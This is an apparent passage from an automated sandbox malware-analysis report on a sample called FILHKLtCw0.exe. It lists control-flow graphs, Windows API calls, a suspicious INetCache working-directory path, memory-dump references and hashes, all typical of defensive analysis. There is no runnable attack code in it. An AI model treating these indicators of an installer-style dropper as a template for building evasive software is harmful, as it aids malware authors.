                                                                                                              • Not Executed
                                                                                                              control_flow_graph 827 405683-4056ce CreateDirectoryW 828 4056d0-4056d2 827->828 829 4056d4-4056e1 GetLastError 827->829 830 4056fb-4056fd 828->830 829->830 831 4056e3-4056f7 SetFileSecurityW 829->831 831->828 832 4056f9 GetLastError 831->832 832->830
                                                                                                              APIs
                                                                                                              • CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                              • GetLastError.KERNEL32 ref: 004056DA
                                                                                                              • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                              • GetLastError.KERNEL32 ref: 004056F9
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                              • API String ID: 3449924974-823278215
                                                                                                              • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                              • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                              • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                              • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 833 10001759-10001795 call 10001b18 837 100018a6-100018a8 833->837 838 1000179b-1000179f 833->838 839 100017a1-100017a7 call 10002286 838->839 840 100017a8-100017b5 call 100022d0 838->840 839->840 845 100017e5-100017ec 840->845 846 100017b7-100017bc 840->846 847 1000180c-10001810 845->847 848 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 845->848 849 100017d7-100017da 846->849 850 100017be-100017bf 846->850 854 10001812-1000184c call 100015b4 call 100024a9 847->854 855 1000184e-10001854 call 100024a9 847->855 870 10001855-10001859 848->870 849->845 856 100017dc-100017dd call 10002b5f 849->856 852 100017c1-100017c2 850->852 853 100017c7-100017c8 call 100028a4 850->853 858 100017c4-100017c5 852->858 859 100017cf-100017d5 call 10002645 852->859 865 100017cd 853->865 854->870 855->870 868 100017e2 856->868 858->845 858->853 874 100017e4 859->874 865->868 868->874 875 10001896-1000189d 870->875 876 1000185b-10001869 call 1000246c 870->876 874->845 875->837 881 1000189f-100018a0 GlobalFree 875->881 883 10001881-10001888 876->883 884 1000186b-1000186e 876->884 881->837 883->875 886 1000188a-10001895 call 1000153d 883->886 884->883 885 10001870-10001878 884->885 885->883 887 1000187a-1000187b FreeLibrary 885->887 886->875 887->883
                                                                                                              APIs
                                                                                                                • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                              • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                                • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                                                                • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                                • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2872673692.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2872653525.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2872698277.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2872715437.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_10000000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                              • String ID:
                                                                                                              • API String ID: 1791698881-3916222277
                                                                                                              • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                              • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                                              • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                              • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 890 405c59-405c65 891 405c66-405c9a GetTickCount GetTempFileNameW 890->891 892 405ca9-405cab 891->892 893 405c9c-405c9e 891->893 895 405ca3-405ca6 892->895 893->891 894 405ca0 893->894 894->895
                                                                                                              APIs
                                                                                                              • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                              • GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405C92
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CountFileNameTempTick
                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                              • API String ID: 1716503409-44229769
                                                                                                              • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                              • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                              • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                              • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 896 4063bf-4063df GetSystemDirectoryW 897 4063e1 896->897 898 4063e3-4063e5 896->898 897->898 899 4063f6-4063f8 898->899 900 4063e7-4063f0 898->900 902 4063f9-406428 wsprintfW LoadLibraryW 899->902 900->899 901 4063f2-4063f4 900->901 901->902
                                                                                                              APIs
                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                              • wsprintfW.USER32 ref: 00406411
                                                                                                              • LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                              • String ID: %s%S.dll
                                                                                                              • API String ID: 2200240437-2744773210
                                                                                                              • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                              • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                              • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                              • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                              APIs
                                                                                                                • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,75923420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75923420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\FILHKLtCw0.exe"), ref: 00405AC2
                                                                                                                • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                                • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                              • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
                                                                                                                • Part of subcall function 00405683: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                              • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Bufagin,?,00000000,000000F0), ref: 00401645
                                                                                                              Strings
                                                                                                              • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Bufagin, xrefs: 00401638
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                              • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\Bufagin
                                                                                                              • API String ID: 1892508949-3515500811
                                                                                                              • Opcode ID: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                              • Instruction ID: 2a65e9898054e9c842dee46b5c7982ab048171bb6952f998b4aca48d6bd22bb3
                                                                                                              • Opcode Fuzzy Hash: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                              • Instruction Fuzzy Hash: 96119331504504EBCF20BFA4CD4599E36A1EF44368B25093BEA46B62F2DA394A819E5D
                                                                                                              APIs
                                                                                                              • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                                • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                                              • String ID:
                                                                                                              • API String ID: 3748168415-3916222277
                                                                                                              • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                              • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                              • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                              • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FEE
                                                                                                                • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,759223A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,759223A0), ref: 0040520F
                                                                                                                • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401FFF
                                                                                                              • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 0040207C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                              • String ID:
                                                                                                              • API String ID: 334405425-0
                                                                                                              • Opcode ID: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                              • Instruction ID: 561ed2f99fcd8f3c69216c61aae9e950b585f3ecd418fa9455324ea25216acba
                                                                                                              • Opcode Fuzzy Hash: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                              • Instruction Fuzzy Hash: 8221A731900209EBDF20AF65CE48A9E7E71BF00354F20427BF510B51E1CBBD8A81DA5D
                                                                                                              APIs
                                                                                                                • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,0000046B,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                              • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                              • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsn582.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Enum$CloseOpenValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 167947723-0
                                                                                                              • Opcode ID: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                              • Instruction ID: caa0a88e983a87845293d3a09aded013c5498a2120ee6ea3f3930af667db2d56
                                                                                                              • Opcode Fuzzy Hash: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                              • Instruction Fuzzy Hash: 9FF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                                                                              APIs
                                                                                                              • SetFilePointer.KERNELBASE(00000000), ref: 10002963
                                                                                                              • GetLastError.KERNEL32 ref: 10002A6A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2872673692.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2872653525.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2872698277.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2872715437.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_10000000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                              • String ID:
                                                                                                              • API String ID: 2976181284-0
                                                                                                              • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                              • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                                                              • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                              • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                                                              APIs
                                                                                                                • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,0000046B,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                              • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                              • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsn582.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                              • String ID:
                                                                                                              • API String ID: 3677997916-0
                                                                                                              • Opcode ID: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                              • Instruction ID: 28617f4b1a8802b5017de0243b5a45cf97da40b04a50325282b533cdbf166070
                                                                                                              • Opcode Fuzzy Hash: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                              • Instruction Fuzzy Hash: 64115E31911205EBDB14CFA4DA489AEB7B4EF44354B20843FE446B72D0DAB89A41EB59
                                                                                                              APIs
                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                              • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866133680.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_400000_FILHKLtCw0.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 3850602802-0
                                                                                                              • Opcode ID: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                              • Instruction ID: cd3aabbb77ee63ed71f9921c47df44d3aa6e588553b0b950a072bc92d791a3e5
                                                                                                              • Opcode Fuzzy Hash: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                              • Instruction Fuzzy Hash: 2101F4316202209FE7095B389D05B6A3698E710319F10863FF851F62F1DA78DC428B4C
                                                                                                              APIs
                                                                                                              • GetModuleHandleA.KERNEL32(?,?,00000020,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                • Part of subcall function 004063BF: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                • Part of subcall function 004063BF: wsprintfW.USER32 ref: 00406411
                                                                                                                • Part of subcall function 004063BF: LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2865991484.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2865976742.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866006123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2866052559.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
